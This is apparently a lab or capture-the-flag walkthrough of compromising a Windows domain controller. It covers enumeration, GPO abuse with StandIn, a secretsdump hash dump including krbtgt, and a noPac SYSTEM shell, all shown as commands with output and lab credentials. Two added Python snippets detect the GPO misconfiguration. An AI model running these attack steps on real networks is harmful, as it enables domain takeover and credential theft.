NMAP
Nmap scan report for 192.168.250.97
Host is up (0.075s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-13 19:28:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: secura.yzx, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: SECURA)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: secura.yzx, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Great! This is the last machine we have. We found some credentials, but most of them don't work. Only the credentials of the user 'charlotte' work, and that account is a member of 'Remote Management Users', so it can log in over WinRM.
netexec smb 192.168.250.97 -u charlotte -p 'Game2On4.!'
SMB 192.168.250.97 445 DC01 [*] Windows Server 2016 Standard 14393 x64 (name:DC01) (domain:secura.yzx) (signing:True) (SMBv1:True)
SMB 192.168.250.97 445 DC01 [+] secura.yzx\charlotte:Game2On4.!
netexec winrm 192.168.250.97 -u charlotte -p 'Game2On4.!'
WINRM 192.168.250.97 5985 DC01 [*] Windows 10 / Server 2016 Build 14393 (name:DC01) (domain:secura.yzx)
WINRM 192.168.250.97 5985 DC01 [+] secura.yzx\charlotte:Game2On4.! (Pwn3d!)
Enumeration with Bloodhound
bloodhound-python -u charlotte -p 'Game2On4.!' -d secura.yzx -dc dc01.secura.yzx -ns 192.168.250.97 -c all
INFO: Found AD domain: secura.yzx
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.secura.yzx:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.secura.yzx
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: dc01.secura.yzx
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: era.secura.yzx
INFO: Querying computer: secure.secura.yzx
INFO: Querying computer: dc01.secura.yzx
INFO: Done in 00M 16S
We can abuse the GPO through its DACL: charlotte has write rights on the Default Domain Policy, which applies to DC01. Upload the tool StandIn_v13_Net45.exe to DC01 and first list the ACL of that GPO:
*Evil-WinRM* PS C:\Users\TEMP\Documents> .\StandIn_v13_Net45.exe --gpo --filter 'Default Domain Policy' --acl
[?] Using DC : dc01.secura.yzx
[+] GPO result count : 1
|_ Result limit : 50
|_ Applying search filter
[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=secura,DC=yzx
GPCFilesysPath : \\secura.yzx\sysvol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
Path : OK
[+] Account : CREATOR OWNER
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly
[+] Account : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None
[+] Account : NT AUTHORITY\Authenticated Users
Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None
[+] Account : NT AUTHORITY\SYSTEM
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
[+] Account : SECURA\Domain Admins
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly
[+] Account : SECURA\Domain Admins
Type : Allow
Rights : Write, ReadAndExecute, ChangePermissions, TakeOwnership, Synchronize
Inherited ACE : False
Propagation : None
[+] Account : SECURA\Enterprise Admins
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly
[+] Account : SECURA\Enterprise Admins
Type : Allow
Rights : Write, ReadAndExecute, ChangePermissions, TakeOwnership, Synchronize
Inherited ACE : False
Propagation : None
[+] Account : SECURA\charlotte
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
[+] Account : SECURA\charlotte
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
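The ACL listing above is what a defender should be auditing: any principal outside the expected set holding FullControl or other write rights on a GPO can rewrite what that GPO deploys. The following is an added example, not part of the original write-up or of StandIn, that parses a constructed excerpt in StandIn's `--gpo --acl` format and flags such ACEs; the allow-list `EXPECTED_WRITERS` is an assumption to adjust per domain.

```python
import re

# Constructed, trimmed excerpt in the format of StandIn's '--gpo --acl' listing
# (sample input for this example, not captured from a live domain).
SAMPLE_ACL = """\
[+] Account : NT AUTHORITY\\Authenticated Users
Type : Allow
Rights : ReadAndExecute, Synchronize
[+] Account : SECURA\\Domain Admins
Type : Allow
Rights : FullControl
[+] Account : SECURA\\charlotte
Type : Allow
Rights : FullControl
"""

# Principals that legitimately hold write rights on a GPO (assumption:
# tailor this allow-list to the domain being audited).
EXPECTED_WRITERS = {"CREATOR OWNER", "NT AUTHORITY\\SYSTEM",
                    "SECURA\\Domain Admins", "SECURA\\Enterprise Admins"}

# File-system rights that let a principal change what the GPO deploys.
WRITE_RIGHTS = {"FullControl", "Modify", "Write", "ChangePermissions", "TakeOwnership"}


def parse_aces(acl_text):
    """Turn each '[+] Account :' block into {'account', 'type', 'rights'}."""
    aces, current = [], None
    for raw in acl_text.splitlines():
        line = raw.strip()
        head = re.match(r"\[\+\] Account\s*:\s*(.+)$", line)
        if head:
            current = {"account": head.group(1).strip(), "rights": set()}
            aces.append(current)
            continue
        field = re.match(r"(Type|Rights)\s*:\s*(.+)$", line)
        if current is not None and field:
            key, value = field.groups()
            if key == "Rights":
                current["rights"] = {r.strip() for r in value.split(",")}
            else:
                current["type"] = value.strip()
    return aces


def find_risky_aces(acl_text, expected=EXPECTED_WRITERS):
    """(account, rights) for Allow ACEs granting write rights outside the expected set."""
    findings = []
    for ace in parse_aces(acl_text):
        granted = sorted(ace["rights"] & WRITE_RIGHTS)
        if ace.get("type") == "Allow" and granted and ace["account"] not in expected:
            findings.append((ace["account"], granted))
    return findings
```

Run over the real listing, the only finding would be the two charlotte ACEs, which is exactly the misconfiguration the rest of this section exploits.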
Exploit: use StandIn's --localadmin option to add charlotte to the local Administrators group through the GPO, then force a policy refresh
*Evil-WinRM* PS C:\Users\TEMP\Documents> .\StandIn_v13_Net45.exe --gpo --filter 'Default Domain Policy' --localadmin charlotte
[?] Using DC : dc01.secura.yzx
[+] GPO Object Found
Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=secura,DC=yzx
GP Path : \\secura.yzx\sysvol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
[+] User Object Found
Object : CN=charlotte
Path : LDAP://CN=charlotte,CN=Users,DC=secura,DC=yzx
SID : S-1-5-21-3453094141-4163309614-2941200192-1104
[?] GPO Version
User : 3
Computer : 70
[+] Writing GPO changes
|_ Updating existing GptTmpl.inf
|_ Adding group membership
|_ Updating revision
|_ Updating gpt.inf
|_ Updating AD object
|_ Incrementing version number
|_ Updating gPCMachineExtensionNames
*Evil-WinRM* PS C:\Users\TEMP\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
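StandIn's "Updating existing GptTmpl.inf" and "Adding group membership" steps above are the artefacts a defender can look for in SYSVOL: a Restricted Groups entry that pushes an extra SID into BUILTIN\Administrators (S-1-5-32-544). The following is an added example, not part of the original write-up or of StandIn, that parses a constructed GptTmpl.inf excerpt in that format and reports members not on an allow-list; the expected-admins SID and the UTF-16 file encoding are assumptions noted in the code.

```python
import re

# Constructed GptTmpl.inf excerpt (sample input, not taken from a live SYSVOL)
# in the Restricted Groups format: a domain user SID has been appended to the
# members of BUILTIN\Administrators (S-1-5-32-544).
SAMPLE_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-3453094141-4163309614-2941200192-512,*S-1-5-21-3453094141-4163309614-2941200192-1104
"""

# Members expected in the DC's local Administrators group. Assumption: the
# domain's Domain Admins SID (RID 512); tailor this to the environment.
EXPECTED_ADMINS = {"S-1-5-21-3453094141-4163309614-2941200192-512"}


def load_gpttmpl(path):
    """Read a GptTmpl.inf from SYSVOL; the [Unicode] header means UTF-16 text
    (assumption: fall back to the default encoding if a file is plain ASCII)."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


def parse_group_membership(inf_text):
    """Map each group SID under [Group Membership] to its '__Members' SIDs."""
    members, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line == "[Group Membership]"
            continue
        hit = re.match(r"\*?(S-[\d-]+)__Members\s*=\s*(.*)$", line) if in_section else None
        if hit:
            sids = [s.strip().lstrip("*") for s in hit.group(2).split(",") if s.strip()]
            members[hit.group(1)] = sids
    return members


def unexpected_admins(inf_text, expected=EXPECTED_ADMINS):
    """SIDs pushed into BUILTIN\\Administrators that are not on the allow-list."""
    admins = parse_group_membership(inf_text).get("S-1-5-32-544", [])
    return [sid for sid in admins if sid not in expected]
```

Pairing this with a watch on the GPO's versionNumber attribute (StandIn increments it, as the output shows) gives a cheap trigger for re-reading the file.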
Now we need to log out and log in again so that the new group membership is present in our token:
evil-winrm -i 192.168.250.97 -u charlotte -p 'Game2On4.!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\TEMP\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================ ==============================================
secura\charlotte S-1-5-21-3453094141-4163309614-2941200192-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\users> type Administrator.DC01\desktop\proof.txt
ad12392e3bad2e3218419201b1f8df2b
*Evil-WinRM* PS C:\users> type charlotte\desktop\local.txt
ed3fd833328d51a4e776e24c9b0a18a8
*Evil-WinRM* PS C:\users>
Dump all hashes with secretsdump (charlotte is now a local administrator on DC01, so SAM, LSA secrets and the NTDS secrets via DRSUAPI are all reachable):
secretsdump.py secura.yzx/charlotte:'Game2On4.!'@192.168.250.97
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x939b8d8d02940b871aa06a965864d6d8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d38e7c66048f80fd9566ab85afca76b1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
SECURA\DC01$:aes256-cts-hmac-sha1-96:1b5aa9beafeb672f847de583cd7ba2562ec707b1cd9bb4979b7a7a51f8e35e81
SECURA\DC01$:aes128-cts-hmac-sha1-96:9d3c75299391321265106b197b79ab0b
SECURA\DC01$:des-cbc-md5:857916dc805b1976
SECURA\DC01$:aad3b435b51404eeaad3b435b51404ee:89048395f5616697572869122cfce19a:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd2698be6ec212927c654dce98399ebdb8cbeda16
dpapi_userkey:0x06c53820508a13889bcacdeb31116f8784a24229
[*] NL$KM
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d38e7c66048f80fd9566ab85afca76b1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:431f60ffa71152f8445bea272663d7c3:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
secura.yzx\michael:1103:aad3b435b51404eeaad3b435b51404ee:86593b65670ad9905e397ed56e6a86f3:::
secura.yzx\charlotte:1104:aad3b435b51404eeaad3b435b51404ee:dd76c2d1f3dd82f52fd7a233b37ce1c5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:89048395f5616697572869122cfce19a:::
SECURE$:1105:aad3b435b51404eeaad3b435b51404ee:e9387dcf22b9d984bd9c0b93b07ea32a:::
ERA$:1106:aad3b435b51404eeaad3b435b51404ee:b044f8f20a0416e3e906cca04473959a:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:5478fb1981352b3687e06f6c42ea6401118dc8d43d96d8d08933d170902a6891
krbtgt:aes128-cts-hmac-sha1-96:584a0adb74e771c1e5b5c8aee72ea580
krbtgt:des-cbc-md5:736dc8c7d97f1383
secura.yzx\michael:aes256-cts-hmac-sha1-96:9a9cf39d1495f6134b89127fd69c2b448304997943ae5c45766e60465eee002b
secura.yzx\michael:aes128-cts-hmac-sha1-96:5a411f11ea06fb2b67b1d05c4db353f4
secura.yzx\michael:des-cbc-md5:37231ce52f01fb37
secura.yzx\charlotte:aes256-cts-hmac-sha1-96:a3fe802e478b95cf925c2a843dd57df64401764a1acd9536e6d771637f7000cb
secura.yzx\charlotte:aes128-cts-hmac-sha1-96:90baa1de1bdf9eef1785feaa30ea92c7
secura.yzx\charlotte:des-cbc-md5:644fc4b970bac8f1
DC01$:aes256-cts-hmac-sha1-96:1b5aa9beafeb672f847de583cd7ba2562ec707b1cd9bb4979b7a7a51f8e35e81
DC01$:aes128-cts-hmac-sha1-96:9d3c75299391321265106b197b79ab0b
DC01$:des-cbc-md5:1a13d9d64af2e0bf
SECURE$:aes256-cts-hmac-sha1-96:6a961c58c795714320f03652116b82416c0fa0554968e04813c1c3504e195b09
SECURE$:aes128-cts-hmac-sha1-96:cb08edbe812dea723e08e06ccad50762
SECURE$:des-cbc-md5:f1f23d29f4b65edf
ERA$:aes256-cts-hmac-sha1-96:dc6c8cb32d3c465dfaf7e27dfe9ee9da18cce58839e712f06a456cc1d3fd3217
ERA$:aes128-cts-hmac-sha1-96:65ce339bfc2999b564e06237365076e6
ERA$:des-cbc-md5:6e4a25237597ba38
[*] Cleaning up...
Another way is the noPac exploit, which relies on charlotte being able to add a machine account (ms-DS-MachineAccountQuota is 10 here):
python3 noPac.py secura.yzx/charlotte:'Game2On4.!' -shell -use-ldap -dc-ip 192.168.250.97
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc01.secura.yzx
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-HKPUBD1TPLW$"
[*] MachineAccount "WIN-HKPUBD1TPLW$" password = ZE$a^&A9k@WW
[*] Successfully added machine account WIN-HKPUBD1TPLW$ with password ZE$a^&A9k@WW.
[*] WIN-HKPUBD1TPLW$ object = CN=WIN-HKPUBD1TPLW,CN=Computers,DC=secura,DC=yzx
[*] WIN-HKPUBD1TPLW$ sAMAccountName == dc01
[*] Saving a DC's ticket in dc01.ccache
[*] Reseting the machine account to WIN-HKPUBD1TPLW$
[*] Restored WIN-HKPUBD1TPLW$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc01.secura.yzx.ccache
[*] Attempting to del a computer with the name: WIN-HKPUBD1TPLW$
[-] Delete computer WIN-HKPUBD1TPLW$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
dc01
C:\Windows\system32>